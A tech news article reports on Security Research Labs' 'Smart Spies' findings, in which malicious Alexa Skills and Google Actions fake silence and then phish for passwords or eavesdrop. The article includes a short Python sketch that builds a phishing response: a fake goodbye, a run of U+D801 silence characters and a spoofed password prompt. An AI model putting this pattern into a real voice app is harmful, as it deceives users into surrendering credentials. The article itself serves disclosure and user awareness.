Yep, your smart speaker can spy on you and steal your passwords
Just as Amazon and Google are desperately trying to convince us they’re not listening to everything we say, security researchers have demonstrated how easily these devices can be infiltrated by hackers to eavesdrop on your conversations. And also – just for giggles – to phish for your passwords.
German research group Security Research Labs discovered a class of vulnerabilities it has dubbed Smart Spies. Through various trickery, a malicious voice app adds a long pause to Alexa or Google Assistant’s response to make you think the device is no longer listening.
It then prompts you, while mimicking Alexa or Google, to update your device and asks for personally identifiable information such as a password – or it simply continues to listen in on your conversations, transcribing what you say and sending the transcript to the hacker.
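According to the researchers’ write-up, the fake pause relied on feeding the speech engine the unpronounceable character U+D801, repeated as the sequence “�. ”, which the text-to-speech engine renders as silence. As a purely illustrative sketch – not the researchers’ actual code, and with made-up prompt wording – a malicious skill’s response text could fake an exit and then phish like this:

```python
# Illustrative only: how a malicious voice app's response text could feign
# exiting, stay "silent", then deliver a spoofed system prompt.
# U+D801 is an unpronounceable character; per SR Labs' report, repeating
# the sequence "U+D801. " causes the speech engine to output silence.

SILENCE = "\ud801. " * 40  # long unpronounceable run -> perceived silence

def build_phishing_response() -> str:
    goodbye = "Goodbye."  # the user believes the skill has exited
    fake_prompt = (
        "An important security update is available for your device. "
        "Please say start update, followed by your password."
    )  # spoofed "system" message (hypothetical wording)
    return goodbye + SILENCE + fake_prompt
```

Because the pause sits inside a single response, the skill’s session never actually ends – the device is still listening the whole time.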
According to a report by Ars Technica, the vulnerability arises because, although both Amazon and Google review Skills and Actions before they are added to their platforms, updates are not reviewed – so a seemingly innocuous app can go rogue with no one being any the wiser.
The security researchers developed eight apps – four Alexa Skills and four Google Home Actions – that did exactly this. Ostensibly simple horoscope apps, behind the scenes they could listen in on conversations or convince users to give up passwords or email addresses.
In an email to Gizmodo, Security Research Labs said the vulnerability was discovered in February. “We were surprised to see the Smart Spies hacks still worked more than three months after reporting the issues to Google and Amazon,” they wrote.
The apps are no longer available, but you can see demonstrations of how they work in YouTube videos the researchers posted to their blog.
“Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers,” they wrote on their blog. “Using a new voice app should be approached with a similar level of caution as installing a new app on your smartphone.”
Security Research Labs shared its findings with the companies and recommended that they implement more thorough review processes for third-party Skills and Actions.
Amazon responded to the group with the following statement:
“Customer trust is important to us, and we conduct security reviews as part of the skill certification process. We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.”
Amazon also pointed out that users should never share their password with a device over voice; any request for that kind of information is not from Amazon.
Google’s response was similar. “All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies. We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future.”
According to the researchers, there is little to no evidence that any such apps are currently threatening Alexa and Google Home users. Even so, owners of these devices should remain vigilant for any suspicious activity on their smart speakers.